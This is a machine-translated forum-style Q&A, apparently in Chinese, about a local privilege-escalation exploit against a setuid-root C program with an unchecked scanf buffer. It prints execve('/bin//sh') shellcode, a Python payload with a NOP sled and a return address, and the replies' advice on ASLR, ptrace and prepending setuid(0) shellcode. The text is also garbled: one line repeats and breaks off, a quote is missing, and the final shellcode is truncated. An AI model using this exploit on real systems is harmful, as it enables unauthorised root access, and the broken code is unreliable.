我正在尝试对具有root特权的易受攻击的程序利用特权升级。我为此尝试了一个shell代码,但不知道在哪里出错。
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]) {
char buf[256];
int len, i;
scanf("%s", buf);
len = strlen(buf);
printf("%s\n", buf);
return 0;
}
缓冲区的地址从“ 0x7fffffffdfd0”开始。缓冲区的大小为272字节。我使用了以下29个字节的shell代码:
\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05
此外,我在攻击场景中使用了以下输入:
(python -c 'print \x90"*243+"\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"+"\xd0\xdf\xff\xff\xff\x7f"') > payload.txt
当我在GDB中使用“运行
当我在GDB中使用“运行
这是预期的:setuid程序在ptrace d时(在调试器下运行时)不会从内核获得特殊特权。否则,有可能劫持any setuid程序(不仅是易受攻击的程序)。
缓冲区的地址从“ 0x7fffffffdfd0”开始。
你怎么知道的?您是否在GDB中找到了该地址?您禁用了ASLR吗?
GDB禁用了ASLR(为了使调试更容易-所有内容始终位于同一地址)。
如果您未在系统范围内禁用ASLR,则buffer很有可能not从0x7fffffffdfd0开始。
我想,用setuid(0)添加您的shellcode
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0)
修改的shellcode:
\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x0